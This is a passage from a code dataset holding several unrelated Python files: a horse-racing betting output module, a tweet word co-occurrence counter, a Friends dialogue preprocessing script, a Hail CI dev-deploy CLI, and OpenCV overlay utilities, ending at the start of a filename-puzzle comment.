get_wide_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"1\").rename(\n columns={\"RACE_KEY1\": \"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"2\").rename(\n columns={\"RACE_KEY2\": \"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"UMABAN1 != UMABAN2\")\n base_df.loc[:, \"UMABAN_bet\"] = base_df.apply(lambda x: sorted([x[\"UMABAN1\"], x[\"UMABAN2\"]]), axis=1)\n base_df.loc[:, \"UMABAN_1\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[0])\n base_df.loc[:, \"UMABAN_2\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[1])\n odds_df = self.ext.get_odds_df(\"ワイド\")\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = target_df.rename(columns={\"ワイドオッズ\": \"オッズ\"})\n return target_df\n\n def get_sanrenpuku_target_df(self, uma1_df, uma2_df, uma3_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"1\").rename(columns={\"RACE_KEY1\":\"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"2\").rename(columns={\"RACE_KEY2\":\"RACE_KEY\"})\n add_uma3_df = pd.merge(uma3_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"3\").rename(columns={\"RACE_KEY3\":\"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = pd.merge(base_df, add_uma3_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"(UMABAN1 != UMABAN2) and (UMABAN2 != UMABAN3) and (UMABAN3 != UMABAN1)\")\n base_df.loc[:, \"UMABAN_bet\"] = base_df.apply(lambda x: sorted([x[\"UMABAN1\"], x[\"UMABAN2\"], x[\"UMABAN3\"]]), axis=1)\n base_df.loc[:, \"UMABAN_1\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[0])\n base_df.loc[:, \"UMABAN_2\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[1])\n base_df.loc[:, \"UMABAN_3\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[2])\n odds_df = self.ext.get_odds_df(\"三連複\")\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"UMABAN_3\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"UMABAN_3\"])\n target_df = target_df.rename(columns={\"3連複オッズ\": \"オッズ\"})\n return target_df\n\n def create_result_raceuma_mark_file(self):\n ru_cluster_path = self.target_path + \"UmaMark8/\"\n for file in self.file_list:\n print(file)\n file_text = \"\"\n temp_df = self.raceuma_result_df.query(f\"file_id == '{file}'\")\n nichiji_list = sorted(temp_df[\"nichiji\"].drop_duplicates())\n for nichiji in nichiji_list:\n temp2_df = temp_df.query(f\"nichiji == '{nichiji}'\")\n race_list = sorted(temp2_df[\"RACE_KEY\"].drop_duplicates())\n for race in race_list:\n line_text = \" \"\n temp3_df = temp2_df.query(f\"RACE_KEY == '{race}'\").sort_values(\"UMABAN\")\n i = 0\n for idx, val in temp3_df.iterrows():\n if len(str(val[\"ru_cluster\"])) == 1:\n line_text += ' ' + str(val[\"ru_cluster\"])\n else:\n line_text += ' '\n i += 1\n if i != 18:\n for j in range(i, 18):\n line_text += \" \"\n file_text += line_text + '\\r\\n'\n with open(ru_cluster_path + \"UM\" + file + \".DAT\", mode='w', encoding=\"shift-jis\") as f:\n f.write(file_text.replace('\\r', ''))\n\n def create_result_race_comment_file(self):\n for file in self.rc_file_list:\n print(file)\n race_comment_df = self.race_result_df.query(f\"rc_file_id == '{file}'\")[[\"RACE_KEY\", \"レースコメント\"]].sort_values(\n \"RACE_KEY\")\n folder_path = self.target_path + \"RACE_COM/20\" + file[4:6]\n filename = file + \".dat\"\n self._export_file(race_comment_df, folder_path, filename, False)\n# race_comment_df.to_csv(self.target_path + \"RACE_COM/20\" + file[4:6] + \"/\" + file + \".dat\", header=False,\n# index=False, encoding=\"cp932\")\n\n def create_result_raceuma_comment_file(self):\n for file in self.kc_file_list:\n print(file)\n race_comment_df = self.raceuma_result_df.query(f\"kc_file_id == '{file}'\")[[\"RACE_KEY\", \"UMABAN\", \"レース馬コメント\"]]\n race_comment_df.loc[:, \"RACE_UMA_KEY\"] = race_comment_df[\"RACE_KEY\"] + race_comment_df[\"UMABAN\"]\n race_comment_df = race_comment_df[[\"RACE_UMA_KEY\", \"レース馬コメント\"]].sort_values(\"RACE_UMA_KEY\")\n folder_path = self.target_path + \"KEK_COM/20\" + file[4:6]\n filename = file + \".dat\"\n self._export_file(race_comment_df, folder_path, filename, False)\n# race_comment_df.to_csv(self.target_path + \"KEK_COM/20\" + file[4:6] + \"/\" + file + \".dat\", header=False,\n# index=False, encoding=\"cp932\")\n\n def create_pbi_file(self):\n ## race\n race_df = self.ext.get_race_before_table_base()\n race_df.loc[:, \"レースNo\"] = race_df[\"RACE_KEY\"].str[6:8]\n race_df.loc[:, \"種別\"] = race_df[\"種別\"].apply(lambda x: mu.convert_shubetsu(x))\n race_df.loc[:, \"芝ダ\"] = race_df[\"芝ダ障害コード\"].apply(lambda x: mu.convert_shida(x))\n race_df.loc[:, \"コース名\"] = race_df.apply(lambda x: self._get_course_name(x), axis=1)\n race_df = race_df[[\"RACE_KEY\", \"場名\", \"レースNo\", \"距離\", \"芝ダ\", \"種別\", \"条件\", \"target_date\", \"コース名\",\n \"発走時間\", \"レース名9文字\", \"WIN5フラグ\"]].copy()\n race_df.loc[:, \"年月\"] = race_df[\"target_date\"].str[0:6]\n yearmonth_list = race_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = race_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/race/', ym + \".csv\", True)\n ## raceuma\n raceuma_df = self.ext.get_raceuma_before_table_base()\n raceuma_df = raceuma_df[[\"RACE_KEY\", \"UMABAN\", \"基準オッズ\", \"基準人気順位\", \"騎手名\", \"調教師名\", \"馬名\", \"血統登録番号\",\n \"IDM\", \"負担重量\", \"枠番\", \"脚質\", \"距離適性\", \"芝適性コード\", \"ダ適性コード\", \"テン指数\",\n \"ペース指数\", \"上がり指数\", \"位置指数\", \"性別コード\", \"馬主会コード\", \"走法\", \"芝ダ障害フラグ\", \"距離フラグ\",\n \"クラスフラグ\", \"転厩フラグ\", \"去勢フラグ\", \"乗替フラグ\", \"放牧先ランク\", \"厩舎ランク\", \"調教コースコード\",\n \"追切種類\", \"追い状態\", \"調教タイプ\", \"調教距離\", \"調教重点\", \"仕上指数\", \"調教量評価\", \"仕上指数変化\", \"target_date\"]].copy()\n raceuma_df = pd.merge(raceuma_df, self.target_mark_df, on=[\"RACE_KEY\", \"UMABAN\"])\n win5_df = self.win5_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n win5_df.columns = [\"RACE_KEY\", \"UMABAN\", \"win5_rank\"]\n win_df = self.win_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n win_df.columns = [\"RACE_KEY\", \"UMABAN\", \"win_rank\"]\n jiku_df = self.jiku_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n jiku_df.columns = [\"RACE_KEY\", \"UMABAN\", \"jiku_rank\"]\n ana_df = self.ana_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n ana_df.columns = [\"RACE_KEY\", \"UMABAN\", \"ana_rank\"]\n nigeuma_df = self.nigeuma_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n nigeuma_df.columns = [\"RACE_KEY\", \"UMABAN\", \"nige_rank\"]\n agari_df = self.agari_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n agari_df.columns = [\"RACE_KEY\", \"UMABAN\", \"agari_rank\"]\n ten_df = self.ten_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n ten_df.columns = [\"RACE_KEY\", \"UMABAN\", \"ten_rank\"]\n total_df = self.total_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n total_df.columns = [\"RACE_KEY\", \"UMABAN\", \"total_rank\"]\n point_df = self.point_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n point_df.columns = [\"RACE_KEY\", \"UMABAN\", \"point_rank\"]\n raceuma_df = pd.merge(raceuma_df, win5_df, on=[\"RACE_KEY\", \"UMABAN\"], how='left')\n raceuma_df = pd.merge(raceuma_df, win_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, jiku_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, ana_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, nigeuma_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, agari_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, ten_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, total_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, point_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df.loc[:, \"RACE_UMA_ID\"] = raceuma_df[\"RACE_KEY\"].str.cat(raceuma_df[\"UMABAN\"])\n raceuma_df.loc[:, \"年月\"] = raceuma_df[\"target_date\"].str[0:6]\n yearmonth_list = raceuma_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = raceuma_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/raceuma/', ym + \".csv\", True)\n ## bet\n bet_df = pd.merge(self.target_bet_df, self.race_base_df[[\"NENGAPPI\", \"RACE_ID\"]], on=\"RACE_ID\")\n bet_df.loc[:, \"年月\"] = bet_df[\"NENGAPPI\"].str[0:6]\n yearmonth_list = bet_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = bet_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/bet/', ym + \".csv\", True)\n\n\n def create_pbi_result_file(self):\n ## race_result\n race_result_df = self.ext.get_race_table_base()\n race_result_df.loc[:, \"種別\"] = race_result_df[\"種別\"].apply(lambda x: mu.convert_shubetsu(x))\n race_result_df.loc[:, \"芝ダ\"] = race_result_df[\"芝ダ障害コード\"].apply(lambda x: mu.convert_shida(x))\n race_result_df.loc[:, \"コース名\"] = race_result_df.apply(lambda x: self._get_course_name(x), axis=1)\n race_result_df = race_result_df[[\"RACE_KEY\", \"距離\", \"芝ダ\", \"右左\", \"内外\", \"種別\", \"条件\", \"グレード\", \"レース名9文字\", \"コース名\",\n \"WIN5フラグ\", \"場名\", \"芝馬場状態コード\", \"ダ馬場状態コード\", \"芝種類\", \"草丈\", \"転圧\", \"凍結防止剤\",\n \"中間降水量\", \"レースコメント\", \"ハロンタイム01\", \"ハロンタイム02\", \"ハロンタイム03\", \"ハロンタイム04\",\n \"ハロンタイム05\", \"ハロンタイム06\", \"ハロンタイム07\", \"ハロンタイム08\", \"ハロンタイム09\", \"ハロンタイム10\",\n \"ハロンタイム11\", \"ハロンタイム12\", \"ハロンタイム13\", \"ハロンタイム14\", \"ハロンタイム15\", \"ハロンタイム16\",\n \"ハロンタイム17\", \"ハロンタイム18\", \"ラスト5ハロン\", \"ラスト4ハロン\", \"ラスト3ハロン\", \"ラスト2ハロン\",\n \"ラスト1ハロン\", \"ラップ差4ハロン\", \"ラップ差3ハロン\", \"ラップ差2ハロン\", \"ラップ差1ハロン\", \"RAP_TYPE\",\n \"TRACK_BIAS_ZENGO\", \"TRACK_BIAS_UCHISOTO\", \"target_date\"]].copy()\n race_result_df = pd.merge(race_result_df, self.race_base_df[[\"RACE_KEY\", \"RACE_ID\"]], on=\"RACE_KEY\")\n race_result_df.loc[:, \"年月\"] = race_result_df[\"target_date\"].str[0:6]\n yearmonth_list = race_result_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = race_result_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/race_result/', ym + \".csv\", True)\n ## raceuma_result\n raceuma_result_df = self.ext.get_raceuma_table_base()\n raceuma_result_df = raceuma_result_df[[\"RACE_KEY\", \"UMABAN\", \"基準オッズ\", \"基準人気順位\", \"騎手名\", \"調教師名\", \"馬名\", \"血統登録番号\", \"着順\",\n \"IDM\", \"負担重量\", \"枠番\", \"脚質\", \"距離適性\", \"芝適性コード\", \"ダ適性コード\", \"テン指数\",\n \"ペース指数\", \"上がり指数\", \"位置指数\", \"性別コード\", \"馬主会コード\", \"走法\", \"芝ダ障害フラグ\", \"距離フラグ\",\n \"クラスフラグ\", \"転厩フラグ\", \"去勢フラグ\", \"乗替フラグ\", \"放牧先ランク\", \"厩舎ランク\", \"調教コースコード\",\n \"追切種類\", \"追い状態\", \"調教タイプ\", \"調教距離\", \"調教重点\", \"仕上指数\", \"調教量評価\", \"仕上指数変化\",\n \"タイム\", \"確定単勝オッズ\", \"確定単勝人気順位\", \"IDM結果\", \"テン指数結果\", \"上がり指数結果\", \"ペース指数結果\",\n \"前3Fタイム\", \"後3Fタイム\", \"コーナー順位1\", \"コーナー順位2\", \"コーナー順位3\", \"コーナー順位4\", \"馬体重\",\n \"レース脚質\", \"単勝\", \"複勝\", \"レース馬コメント\", \"馬具(その他)コメント\", \"パドックコメント\", \"脚元コメント\", \"target_date\"]].copy()\n raceuma_result_df = pd.merge(raceuma_result_df, self.race_base_df[[\"RACE_KEY\", \"RACE_ID\"]], on=\"RACE_KEY\")\n raceuma_result_df.loc[:, \"年月\"] = raceuma_result_df[\"target_date\"].str[0:6]\n raceuma_result_df.loc[:, \"RACE_UMA_ID\"] = raceuma_result_df[\"RACE_KEY\"].str.cat(raceuma_result_df[\"UMABAN\"])\n yearmonth_list = raceuma_result_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = raceuma_result_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/raceuma_result/', ym + \".csv\", True)\n ## haraimodoshi\n haraimodoshi_df = self.ext.get_haraimodoshi_table_base()\n tansho_df = self.ext.get_tansho_df(haraimodoshi_df)\n tansho_df.loc[:, \"券種\"] = \"単勝\"\n fukusho_df = self.ext.get_fukusho_df(haraimodoshi_df)\n fukusho_df.loc[:, \"券種\"] = \"複勝\"\n umaren_df = self.ext.get_umaren_df(haraimodoshi_df)\n umaren_df.loc[:, \"券種\"] = \"馬連\"\n umatan_df = self.ext.get_umatan_df(haraimodoshi_df)\n umatan_df.loc[:, \"券種\"] = \"馬単\"\n wide_df = self.ext.get_wide_df(haraimodoshi_df)\n wide_df.loc[:, \"券種\"] = \"ワイド\"\n sanrenpuku_df = self.ext.get_sanrenpuku_df(haraimodoshi_df)\n sanrenpuku_df.loc[:, \"券種\"] = \"三連複\"\n return_df = pd.concat([tansho_df, fukusho_df, umaren_df, umatan_df, wide_df, sanrenpuku_df])\n return_df = pd.merge(return_df, self.race_base_df[[\"NENGAPPI\", \"RACE_KEY\"]], on=\"RACE_KEY\")\n return_df.loc[:, \"年月\"] = return_df[\"NENGAPPI\"].str[0:6]\n yearmonth_list = return_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = return_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/return/', ym + \".csv\", True)\n\n def _export_file(self, df, folder_path, filename, header):\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n df.to_csv(folder_path + \"/\" + filename, header=header, index=False, encoding=\"cp932\")\n\n def _return_mark(self, num):\n if num == 1: return \"◎\"\n if num == 2: return \"○\"\n if num == 3: return \"▲\"\n if num == 4: return \"△\"\n if num == 5:\n return \"×\"\n else:\n return \" \"\n\n def _get_target_bet_df(self, bet_df):\n bet_df = pd.merge(bet_df, self.race_base_df, on=\"RACE_KEY\")\n bet_df.loc[:, \"変換フラグ\"] = 0\n bet_df.loc[:, \"購入金額\"] = 100\n bet_df.loc[:, \"的中時の配当\"] = 0\n bet_df.loc[:, \"エリア\"] = \"F\"\n bet_df.loc[:, \"マーク\"] = \"\"\n bet_df = bet_df[[\"RACE_ID\", \"変換フラグ\", \"券種\", \"目1\", \"目2\", \"目3\", \"購入金額\", \"オッズ\", \"的中時の配当\", \"エリア\", \"マーク\"]].copy()\n return bet_df\n\n def _get_course_name(self, sr):\n soto = \"外\" if sr[\"内外\"] == \"2\" else \"\"\n return sr[\"場名\"] + sr[\"芝ダ\"] + str(sr[\"距離\"]) +\"m\" + soto\n\n @classmethod\n def post_slack_text(cls, post_text):\n slack = slackweb.Slack(url=cls.slack_operation_url)\n #slack.notify(text=post_text)\n\n\n\n","sub_path":"modules/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":53709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601376123","text":"import sqlite3\nfrom collections import Counter\nimport re\nimport math\nimport itertools\nimport codecs\nimport json\n\n\n#dbname = 'egypt.db'\n#tablename = 'egypt_tweets'\n#colname = 'tweet'\n\n#dbname = 'japan.db'\n#tablename = 'merged_tweets_4'\n#colname = 'text'\n\ndbname = 'libya.db'\ntablename = 'libya'\ncolname = 'text'\n\n\nconn = sqlite3.connect(dbname)\n\nprint(\"Opened database successfully\")\n\nwordcount = Counter()\n\nprint(\"scan #1 start\")\ncursor = conn.execute(\"SELECT id, \" + colname + \" from \" + tablename)\nfor row in cursor:\n #print(str(row[0]) + ' ' + row[1])\n #print(str(row[0]))\n tweet = row[1]\n urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', tweet)\n for url in urls:\n tweet = tweet.replace(url,'')\n words = re.findall(r\"#?[\\w']+\", tweet)\n for word in words:\n lword = word.lower()\n wordcount[lword] += 1\nprint(\"scan #1 complete\")\n\nprint(len(wordcount))\n\n#for word in wordcount.keys():\n# print(word, wordcount[word])\n\nprint(\"filter first pass start\")\nwordlist = [(word,wordcount[word]) for word in wordcount.keys()]\nwordlist.sort(key=lambda x: (x[1],x[0]), reverse=True)\n\nuseless_words = ['rt','quot',\"won't\",'at','with',\"they're\",'him',\"we'll\",\"i'm\",'very',\"i'd\",'what','me',\"that's\",'why','then','who','had','would','could',\"let's\",\"we'll\",'also','their','us','by','am','that','was','all','some','many','your','its','get','he','she','an','them','our','we','i','it','the','being','and','of','to','in','on','not','you','com','http','a','my','this','will','is','they','are','if','there','did','for','any','has','from','no','as','so','or','have','too','his','her','be','but',\"it's\",\"haven't\",'should','were','only']\n\n#for useless in useless_words:\n# if useless in wordlist:\n# print('removing ' + useless)\n# wordlist.remove(useless)\n\nnew_wordlist = []\n\nfor word in wordlist:\n if word[0] not in useless_words and len(word[0]) > 1:\n new_wordlist.append(word)\n\nlimit = 10000\n\nupperten = min(limit, math.ceil(len(new_wordlist) / 10))\n\ncandidate_words = [word[0] for word in new_wordlist[:upperten]]\nminwords = new_wordlist[upperten - 1][1]\nprint(upperten)\n\ncandidate_set = set()\n[candidate_set.add(word) for word in candidate_words]\n\ncandidate_words = candidate_set\n\n\nprint(\"filter first pass complete\")\n\n#for i in wordlist[:upperten]:\n# if i[0] not in useless_words:\n# #print(i)\n# candidate_words.append(i[0])\n\ncursor = conn.execute(\"SELECT count(*) from \" + tablename)\nfor r in cursor:\n print(\"tweet count: \" + str(r[0]))\n\ncombocount = Counter()\nprint(\"scan #2 start\")\ncount = 0\ncursor = conn.execute(\"SELECT id, \" + colname + \" from \" + tablename)\nfor row in cursor:\n #print(str(row[0]) + ' ' + row[1])\n #print(str(row[0]))\n tweet = row[1]\n urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', tweet)\n for url in urls:\n tweet = tweet.replace(url,'')\n words = re.findall(r\"#?[\\w']+\", tweet)\n #print(tweet)\n cands = []\n for word in words:\n lword = word.lower()\n if lword in candidate_words:\n cands.append(lword)\n if len(cands) > 1:\n #print(cands)\n cands.sort()\n combs = itertools.combinations(cands,2)\n for i in combs:\n combocount[i] += 1\n \n count += 1\n if count % 1000 == 0:\n print(count)\n\nprint(\"scan #2 complete\")\n\nprint(\"sort combos start\")\ncombolist = [(combo, combocount[combo]) for combo in combocount.keys()]\ncombolist.sort(key=lambda x: (x[1],x[0]), reverse=True)\n\n#upperten2 = min(limit * 5,math.ceil(len(combolist) * 0.2))\n\n#final_combos = combolist[:upperten2]\nfinal_combos = combolist\n\n#print(upperten2)\nprint(\"sort combos complete\")\n\nprint(len(final_combos))\n\nprint(\"Operation done successfully\")\nconn.close()\n\ncombolist = [w for w in final_combos if w[0][0] in candidate_words and w[0][0] in candidate_words and w[1] >= minwords]\n\ncdata = {}\nfor w in combolist:\n cdata[w[0][0] + '|' + w[0][1]] = w[1]\n cdata[w[0][1] + '|' + w[0][0]] = w[1]\n\nwith codecs.open(\"combos.txt\", \"w\",\"utf-8-sig\") as text_file:\n for i in combolist:\n text_file.write(i[0][0] + '\\t' + i[0][1] + '\\t' + str(i[1]) + '\\n')\n \nwith codecs.open(\"combos_json.txt\", \"w\",\"utf-8-sig\") as text_file:\n text_file.write(json.dumps(cdata))\n\nwith codecs.open(\"singles.txt\", \"w\",\"utf-8-sig\") as text_file:\n for i in sorted(list(candidate_words)):\n text_file.write(i + '\\t' + str(wordcount[i]) + '\\n')\n #singlelist[i] = wordcount[i]\n #text_file.write(json.dumps(singlelist))\n","sub_path":"twitter/egypt_read.py","file_name":"egypt_read.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"292338200","text":"\"\"\"\nThis code separates the cornell movie dialogue dataset into training and label files\n\"\"\"\nfrom __future__ import print_function\nimport operator\nfrom itertools import islice\n\ncounter = 0\ntrain_train_utt = open('temp_temp.utt','w')\ntrain_resp = open('temp.resp','w')\n\nvocab = {}\n\npunctuation = {\n\t\"'\": \" '\",\n\t'\"': \" " \",\n\t'\\t': ' ',\n\t'?': ' ? ',\n\t',': ' , ',\n\t'.': ' . ',\n\t'!': ' ! ',\n\t'-': ' - ',\n\t':': ' : ',\n\t# ';': ' ; ',\n\t# '[': ' [ ',\n\t# '[': ' ] ',\n\t# '': '',\n\t# '': '',\n\t'/': ' / '\n}\n\nnum_line = 0\nwith open('friends_processed.txt','r') as file:\n\tfor line in file:\n\t\tnum_line += 1\n\ndef add_to_vocab(sentence):\n\tfor word in sentence.split(' '):\n\t\tif word == '': continue\n\t\tif word not in vocab:\n\t\t\tvocab[word] = 0\n\t\telse:\n\t\t\tvocab[word] += 1\n\ndef format_line_utterance(sentence):\n\t# return sentence\n\tsentence = ' '.join(sentence.lower().split(' ')[1:])\n\tsentence = unicode(sentence, errors='ignore')\n\tfor key in punctuation:\n\t\tsentence = sentence.replace(key,punctuation[key])\n\treturn sentence\n\ndef format_line_response(sentence):\n\t# return sentence\n\tsentence = unicode(sentence.lower(), errors='ignore')\n\tfor key in punctuation:\n\t\tsentence = sentence.replace(key,punctuation[key])\n\treturn sentence\n\nline_ctr = 0\ntrain_file_line_ctr = 0\nstate = 'new_scene'\nremove_lines = []\nwith open('friends_processed.txt','r') as file:\n\tfor line in file:\n\t\tif line[:-1]=='< ':\n\t\t\tstate = 'new_scene'\n\t\t\tline_ctr+=1\n\t\t\tcontinue\n\n\t\tsentence_utt = format_line_utterance(line[:-1])\n\t\tsentence_resp = format_line_response(line[:-1])\n\n\t\tif line_ctr==1 or state=='new_scene':\n\t\t\tprint (sentence_utt, file = train_train_utt)\n\t\t\tstate = 'scene'\n\t\t\tremove_lines.append(train_file_line_ctr)\n\t\t\ttrain_file_line_ctr+=1\n\t\t\tline_ctr+=1\n\t\telif line_ctr==num_line-1:\n\t\t\tprint (sentence_resp, file = train_resp)\n\t\telse:\n\t\t\tprint (sentence_resp, file = train_resp)\n\t\t\tprint (sentence_utt, file = train_train_utt)\n\t\t\ttrain_file_line_ctr+=1\n\t\t\tline_ctr+=1\n\n\t\tadd_to_vocab(sentence_utt)\n\ntrain_train_utt.close()\n\nremove_lines = remove_lines[1:]\n# print (remove_lines)\nline_ctr = 0\ntrain_utt = open('temp.utt','w')\nwith open('temp_temp.utt','r') as file:\n\tfor line in file:\n\t\tline_ctr+=1\n\t\tif line_ctr not in remove_lines:\n\t\t\tprint (line[:-1], file = train_utt)\n\nvocab_file = open('vocab','w')\n\nsorted_x = sorted(vocab.items(), key = operator.itemgetter(1), reverse = True)\n\nfor i in sorted_x:\n\tif i[1] >= 0:\n\t\tprint (str(i[0]), file = vocab_file)","sub_path":"Dataset/Friends Transcripts/prepare_friends.py","file_name":"prepare_friends.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"4942978","text":"import asyncio\nimport aiohttp\n\nfrom hailtop.gear.auth.hailjwt import find_token\n\n\ndef init_parser(parser):\n parser.add_argument(\"--branch\", \"-b\", type=str,\n help=\"Fully-qualified branch, e.g., hail-is/hail:feature.\", required=True)\n parser.add_argument(\"--steps\", \"-s\", type=str,\n help=\"Comma-separated list of steps to run.\", required=True)\n\n\nclass CIClient:\n def __init__(self):\n self._session = None\n\n async def __aenter__(self):\n token = find_token()\n self._session = aiohttp.ClientSession(\n raise_for_status=True,\n timeout=aiohttp.ClientTimeout(total=60),\n headers={\"Authorization\": f\"Bearer {token}\"})\n return self\n\n async def __aexit__(self, exc_type, exc, tb):\n await self.close()\n\n async def close(self):\n if self._session:\n await self._session.close()\n self._session = None\n\n async def dev_deploy_branch(self, branch, steps):\n data = {\n 'branch': branch,\n 'steps': steps\n }\n async with self._session.post(\n 'https://ci.hail.is/api/v1alpha/dev_deploy_branch/', json=data) as resp:\n resp_data = await resp.json()\n return resp_data['batch_id']\n\n\nasync def submit(args):\n steps = args.steps.split(',')\n steps = [s.strip() for s in steps]\n steps = [s for s in steps if s]\n async with CIClient() as ci_client:\n batch_id = await ci_client.dev_deploy_branch(args.branch, steps)\n print(f'Created deploy batch, see https://ci.hail.is/batches/{batch_id}')\n\n\ndef main(args):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(submit(args))\n loop.shutdown_asyncgens()\n","sub_path":"hail/python/hailtop/hailctl/dev/deploy/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"67088957","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport cv2 as cv\nfrom collections import deque\n\n\ndef draw_texts(img, texts, font_scale=1.0, thickness=2):\n h, w, c = img.shape\n offset_x = 20 # 左下の座標\n initial_y = 0\n dy = int(img.shape[1] / 25)\n color = (241, 252, 102) # RGB= 66FCF1\n texts = [texts] if type(texts) == str else texts\n for i, text in enumerate(texts):\n offset_y = initial_y + (i+1)*dy\n cv.putText(img, text, (offset_x, offset_y), cv.FONT_HERSHEY_SIMPLEX,\n font_scale, color, thickness, cv.LINE_AA)\n\n\ndef draw_result_on_img(img, texts, w_ratio=0.3, h_ratio=0.2, alpha=0.4):\n # 文字をのせるためのマットを作成する\n overlay = img.copy()\n pt1 = (0, 0)\n pt2 = (int(img.shape[1] * w_ratio), int(img.shape[0] * h_ratio))\n mat_color = (99, 98, 97) # RGB C5C6C7\n fill = -1 # -1にすると塗りつぶし\n cv.rectangle(overlay, pt1, pt2, mat_color, fill)\n mat_img = cv.addWeighted(overlay, alpha, img, 1 - alpha, 0)\n draw_texts(mat_img, texts)\n return mat_img\n\n\n# original https://github.com/Kazuhito00/mediapipe-python-sample\nclass CvFpsCalc(object):\n def __init__(self, buffer_len=1):\n self._start_tick = cv.getTickCount()\n self._freq = 1000.0 / cv.getTickFrequency()\n self._difftimes = deque(maxlen=buffer_len)\n\n def get(self):\n current_tick = cv.getTickCount()\n different_time = (current_tick - self._start_tick) * self._freq\n self._start_tick = current_tick\n self._difftimes.append(different_time)\n fps = 1000.0 / (sum(self._difftimes) / len(self._difftimes))\n fps_rounded = round(fps, 2)\n return fps_rounded\n","sub_path":"cv_util.py","file_name":"cv_util.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"172075901","text":"# Medium Codewriting 300\n#\n# You are given an array of desired filenames in the order of their creation. Since two files cannot have equal names, the one which comes later will have an addition to its name in a form of (k), where k is the smallest positive integer such that the obtained name is not used yet.\n#\n# Return an array of names that will be given to the files.\n#\n# 